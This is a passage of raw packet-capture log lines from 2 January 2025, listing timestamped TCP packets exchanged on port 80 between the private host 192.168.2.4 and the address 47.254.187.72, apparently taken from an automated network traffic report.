                                                                            Jan 2, 2025 20:34:51.272838116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.272847891 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.272860050 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.272871017 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.272876978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.272881985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.272892952 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.272892952 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.272903919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.272927046 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.272941113 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.277894020 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.277904034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.277926922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.277935982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.277937889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.277949095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.277951002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.277961016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.277971029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.277977943 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.277981997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.278006077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.278023005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.278027058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.278033972 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.278044939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.278062105 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.278064013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.278073072 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.278090954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.278115034 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.278137922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.278147936 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.278162956 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.278172016 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.278172970 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.278198957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.278218031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.279031038 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.279071093 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.279110909 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.279120922 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.279131889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.279138088 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.279143095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.279153109 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.279171944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.279175997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.279184103 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.279194117 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.279195070 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.279217005 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.279237032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.280463934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.280474901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.280491114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.280499935 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.280505896 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.280510902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.280522108 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.280524015 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.280533075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.280543089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.280553102 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.280570030 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.332923889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.332942963 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.332954884 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.332966089 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.332982063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.332997084 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.333002090 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.333009005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.333033085 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.333072901 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.336956024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.336966991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.337008953 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.337018013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.337029934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.337040901 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.337050915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.337069035 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.337080002 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.337080956 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.337111950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338391066 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338418961 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338428974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338435888 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338459015 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338460922 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338468075 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338479996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338479042 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338500977 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338502884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338511944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338536978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338543892 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338551044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338558912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338570118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338577986 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338597059 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338617086 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338637114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338646889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338656902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338680029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338685989 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338696957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338707924 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338707924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338717937 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.338737965 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.338759899 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.339703083 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.339715004 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.339726925 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.339736938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.339749098 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.339756966 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.339760065 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.339771032 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.339782000 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.339811087 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.339824915 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.340909958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.340929985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.340939045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.340954065 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.340976954 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341008902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341018915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341029882 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341041088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341048002 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341051102 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341074944 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341074944 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341084957 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341103077 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341114044 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341114044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341124058 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341140032 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341167927 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341175079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341211081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341238976 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341257095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341268063 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341276884 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341279030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341289997 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341289997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341314077 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341339111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341370106 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341381073 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341392040 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341402054 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341408968 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341413975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.341437101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.341453075 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.351347923 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.351367950 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.351377964 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.351389885 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.351392031 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.351402044 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.351413012 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.351413012 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.351453066 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.351474047 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.351497889 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.351524115 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.351531982 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.354588985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.354599953 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.354610920 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.354643106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.354660034 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.354671001 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.354675055 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.354681969 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.354691982 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.354702950 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.354739904 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.356492996 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.356534004 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.356535912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.356547117 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.356555939 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.356578112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.356580019 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.356590986 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.356601954 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.356609106 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.356612921 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.356631994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.356653929 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.359596014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.359615088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.359626055 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.359637022 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.359643936 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.359659910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.359668016 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.359671116 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.359683037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.359704018 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.359720945 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.364736080 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364748955 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364763975 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364780903 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364793062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364804029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364804029 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.364814997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364820957 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.364825010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364841938 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364852905 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364862919 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364864111 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.364875078 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364877939 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.364886045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364891052 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364905119 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.364907026 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364918947 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.364943981 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.364964008 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.365936041 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.365947008 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.365964890 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.365976095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.365986109 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.365987062 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.365998030 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.366009951 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.366022110 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.366043091 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.367170095 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.367197037 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.367206097 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.367223978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.367240906 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.367257118 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.367269993 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.367280960 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.367290974 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.367296934 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.367305994 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.367332935 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.367353916 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.419651031 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.419667006 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.419688940 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.419708014 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.419708967 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.419718027 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.419730902 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.419737101 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.419739962 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.419750929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.419763088 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.419794083 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.419817924 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.423810005 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.423829079 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.423840046 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.423851013 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.423861027 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.423861980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.423871994 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.423883915 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.423892021 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.423937082 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.425239086 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425283909 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.425298929 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425308943 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425319910 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425331116 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.425355911 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.425364971 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425374985 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425391912 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425394058 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.425401926 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425412893 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425424099 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.425451040 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.425498009 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425507069 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425523043 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425534010 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.425534010 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425544024 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425551891 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.425554991 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425565958 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.425580978 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.425609112 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.426882029 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.426925898 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.426928997 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.426940918 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.426956892 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.426971912 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.427016973 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427027941 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427038908 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427050114 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427061081 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.427061081 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427095890 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.427747011 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427756071 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427772045 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427783966 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427793980 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427794933 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.427804947 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.427823067 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427828074 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.427831888 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427853107 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427865028 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.427865028 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427875042 CET804973047.254.187.72192.168.2.4
                                                                            Jan 2, 2025 20:34:51.427890062 CET4973080192.168.2.447.254.187.72
                                                                            Jan 2, 2025 20:34:51.427917004 CET4973080192.168.2.447.254.187.72
